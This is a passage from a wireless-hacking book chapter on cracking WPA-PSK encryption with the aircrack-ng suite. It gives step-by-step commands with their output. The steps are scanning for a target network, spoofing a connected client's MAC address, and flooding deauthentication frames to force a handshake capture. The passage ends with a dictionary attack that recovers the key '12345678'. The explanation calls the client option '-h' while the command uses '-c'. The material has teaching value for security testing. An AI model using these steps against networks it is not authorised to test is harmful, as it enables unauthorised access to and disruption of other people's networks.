When cracking WEP, statistical methods are vital to speed up the key recovery. It’s a cryptanalytic attack against inherent flaws in the protocol which is why you can crack it so quickly. WPA/WPA2 is different in that only brute force methods work.
It doesn’t matter how many packets or IVs you capture because the live encryption key is not static. The only way you can recover the key is by intercepting an authentication handshake between a client laptop and an access point. With this handshake in your possession it becomes possible to launch a brute force attack (i.e. try every possible key) until you find the one securing the network. This can be done offline. Because the cryptographic schemes used in WPA/WPA2 are computationally expensive (you can’t perform many password guesses a second), unless the target is using a very short password or one that can be found in a
CRACKING ENCRYPTION 137
dictionary, you are never going to recover the key (at least not between now and the death of the universe).
Nonetheless, the following technique can be used to recover the four-way handshake and begin a brute force attack. You will be using the same tools you use to crack WEP and it is first of all necessary to prepare your environment and put your card in monitor mode as explained in the previous section.
Once that is complete, you need to identify your target network. In this case, it is called Wpatarget.
# airodump-ng wlan1
You get the following response:CH 2 ][ Elapsed: 0 s ][ 2009-02-19 12:12
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:22:6B:70:79:A6 40 2 0 0 11 54e OPN Home
00:0F:B5:D4:F2:90 29 2 0 0 11 54 . WPA TKIP PSK NETGEAR
00:1B:FC:42:9B:67 35 3 0 0 11 54 OPN DV201AM
00:13:F7:8B:43:9F 50 1 1 0 6 54 . WPA2 CCMP PSK JJJJR
00:13:49:B5:53:7E 60 2 0 0 7 54 WEP WEP ADSL-WiFi Anja 00:19:CB:0A:EA:63 50 2 0 0 7 54 WPA TKIP PSK MVDH
00:13:49:10:0D:71 58 2 0 0 7 54 . WEP WEP ADSL-WiFi 00:1C:DF:05:C0:7E 36 2 0 0 6 54 . WPA TKIP PSK Wpatarget
00:04:ED:5A:8B:DB 78 4 0 0 5 54 WEP WEP wireless2
00:18:F8:6E:85:A3 18 3 0 0 7 54 WEP WEP M3b2d
00:22:3F:20:C5:8E 57 3 0 0 1 54 . WPA TKIP PSK UPC53144
00:90:D0:E8:F4:B1 18 2 0 0 1 54 WPA2 CCMP PSK SpeedTouchC07700 00:05:B4:0A:54:D8 31 3 0 0 3 54 . WPA TKIP PSK SweexMR
00:13:D4:67:67:7D 26 3 0 0 1 54 WEP WEP pvg
02:18:9B:6F:A5:E0 20 4 0 0 1 54 WPA2 TKIP PSK <length: 14>
00:18:9B:6F:A5:DF 19 4 1 0 1 54 WPA2 TKIP PSK UPC017649
8A:81:1B:D8:8F:85 -1 4 0 0 1 54 OPN wireless
00:14:7F:8D:9F:7F 38 4 0 0 1 54 WPA TKIP PSK SpeedTouchADC252
You can see that the target is running WPA PSK and listening on channel 6.
So, you rerun Airodump to capture all packets on this channel and log them to disk.
# airodump-ng -c 6 --write wpatarget wlan1
Next, you need to identify a client laptop connected to Wpatarget and log its MAC address. The output is shown here:
CH 6 ][ Elapsed: 20 s ][ 2009-02-19 12:12
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:22:6B:70:79:A6 40 2 0 0 11 54e OPN Home
00:0F:B5:D4:F2:90 29 2 0 0 11 54 . WPA TKIP PSK NETGEAR
00:1B:FC:42:9B:67 35 3 0 0 11 54 OPN DV201AM
138 HACKING WIRELESS EQUIPMENT
00:13:F7:8B:43:9F 50 1 1 0 6 54 . WPA2 CCMP PSK JJJJR
00:13:49:B5:53:7E 60 2 0 0 7 54 WEP WEP ADSL-WiFi Anja 00:19:CB:0A:EA:63 50 2 0 0 7 54 WPA TKIP PSK MVDH
00:13:49:10:0D:71 58 2 0 0 7 54 . WEP WEP ADSL-WiFi 00:1C:DF:05:C0:7E 36 2 0 0 6 54 . WPA TKIP PSK Wpatarget
00:04:ED:5A:8B:DB 78 4 0 0 5 54 WEP WEP wireless2
00:18:F8:6E:85:A3 18 3 0 0 7 54 WEP WEP M3b2d
00:22:3F:20:C5:8E 57 3 0 0 1 54 . WPA TKIP PSK UPC53144
00:90:D0:E8:F4:B1 18 2 0 0 1 54 WPA2 CCMP PSK SpeedTouchC07700 00:05:B4:0A:54:D8 31 3 0 0 3 54 . WPA TKIP PSK SweexMR
00:13:D4:67:67:7D 26 3 0 0 1 54 WEP WEP pvg
02:18:9B:6F:A5:E0 20 4 0 0 1 54 WPA2 TKIP PSK <length: 14>
00:18:9B:6F:A5:DF 19 4 1 0 1 54 WPA2 TKIP PSK UPC017649
8A:81:1B:D8:8F:85 -1 4 0 0 1 54 OPN wireless
00:14:7F:8D:9F:7F 38 4 0 0 1 54 WPA TKIP PSK SpeedTouchADC252
BSSID STATION PWR Rate Lost Packets Probe
00:1C:DF:05:C0:7E 00:0E:2E:47:40:E4 -1 6- 0 0 12
You see a workstation with the MAC address of 00:0E:2E:47:40:E4.
Change your own MAC to match this:
# macchanger --mac=00:0E:2E:47:40:E4 wlan1
Current MAC: 00:c0:ca:1b:5c:3a (Alfa, Inc.)
Faked MAC: 00:0e:2e:47:40:e4 (Edimax Technology Co., Ltd.)
Authentication takes place using something called a four-way handshake, which occurs when a client laptop connects to an access point. We need to intercept and capture this process in order to attack the encryption.
The quickest way to achieve this is to force the client to disconnect and reconnect, otherwise you could be waiting around for hours for this to happen legitimately. Making sure that airodump is still logging packets, you run the following command:
# aireplay-ng wlan1 -a 00:1C:DF:05:C0:7E -c 00:0E:2E:47:40:E4 --deauth 0
The -a option refers to the target access point and -h to the target client.
This command runs continuously until you stop it, producing output similar to:
12:31:01 Waiting for beacon frame (BSSID: 00:1C:DF:05:C0:7E) on channel 1 12:31:01 Sending 64 directed DeAuth. STMAC: [00:0E:2E:47:40:E4]
Checking Airodump shows you that a handshake has already been logged:
CRACKING ENCRYPTION 139
CH 6 ][ Elapsed: 20 s ][ 2009-02-19 12:12] WPA handshake: 00:1C:DF:05:C0:7E
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:22:6B:70:79:A6 40 2 0 0 11 54e OPN Home
00:0F:B5:D4:F2:90 29 2 0 0 11 54 . WPA TKIP PSK NETGEAR
00:1B:FC:42:9B:67 35 3 0 0 11 54 OPN DV201AM
00:13:F7:8B:43:9F 50 1 1 0 6 54 . WPA2 CCMP PSK JJJJR
00:13:49:B5:53:7E 60 2 0 0 7 54 WEP WEP ADSL-WiFi Anja 00:19:CB:0A:EA:63 50 2 0 0 7 54 WPA TKIP PSK MVDH
00:13:49:10:0D:71 58 2 0 0 7 54 . WEP WEP ADSL-WiFi 00:1C:DF:05:C0:7E 36 2 1421 0 6 54 . WPA TKIP PSK Wpatarget
00:04:ED:5A:8B:DB 78 4 0 0 5 54 WEP WEP wireless2
00:18:F8:6E:85:A3 18 3 0 0 7 54 WEP WEP M3b2d
00:22:3F:20:C5:8E 57 3 0 0 1 54 . WPA TKIP PSK UPC53144
00:90:D0:E8:F4:B1 18 2 0 0 1 54 WPA2 CCMP PSK SpeedTouchC07700 00:05:B4:0A:54:D8 31 3 0 0 3 54 . WPA TKIP PSK SweexMR
00:13:D4:67:67:7D 26 3 0 0 1 54 WEP WEP pvg
02:18:9B:6F:A5:E0 20 4 0 0 1 54 WPA2 TKIP PSK <length: 14>
00:18:9B:6F:A5:DF 19 4 1 0 1 54 WPA2 TKIP PSK UPC017649
8A:81:1B:D8:8F:85 -1 4 0 0 1 54 OPN wireless
00:14:7F:8D:9F:7F 38 4 0 0 1 54 WPA TKIP PSK SpeedTouchADC252
Now you can use Aircrack to try and recover the key. There are several dictionaries on the BackTrack CD-ROM. However, I recommend you download a huge one from the Internet, such as the Ramius file from www.rainbowtables.net. In the command below, dict.txt refers to any dictionary file you choose:
# aircrack-ng wpatarget-01.cap -w dict.txt
BSSID ESSID Encryption
1 00:04:ED:5A:8B:DB wireless2 WEP (9 IVs)
2 00:19:CB:0A:EA:63 MVDH No data – WEP or WPA 3 00:13:49:10:0D:71 ADSL-WiFi No data – WEP or WPA 4 00:1C:DF:05:C0:7E Wpatarget WPA (1 handshake) 5 00:13:F7:8B:43:9F JJJJR WPA (0 handshake) 6 00:1E:E5:8C:94:BE linksys None (0.0.0.0) 7 00:05:B4:0A:54:D8 SweexMR No data – WEP or WPA
8 00:13:F7:20:7B:4D SMC None (0.0.0.0)
9 00:13:49:B5:53:7E ADSL-WiFi Anja No data – WEP or WPA 10 00:13:F7:35:7D:09 Maurice No data – WEP or WPA 11 00:18:F8:6E:85:A3 M3b2d No data – WEP or WPA
12 00:13:F7:31:6E:54 SMC None (0.0.0.0)
13 00:1D:0F:D5:66:46 ICIDU No data – WEP or WPA Index number of target network ?
We select network 4 and Aircrack dutifully attempts to crack the key by taking each word from its dictionary file (dict.txt), encrypting it and
140 HACKING WIRELESS EQUIPMENT
comparing the result against the hash extracted from the handshake. In this case, the key is found rather quickly:
Aircrack-ng 1.0
[00:00:10] 2 keys tested (37.20 k/s)
KEY FOUND! [ 12345678 ]
Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD
Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98
CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40 FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E
2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71
EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB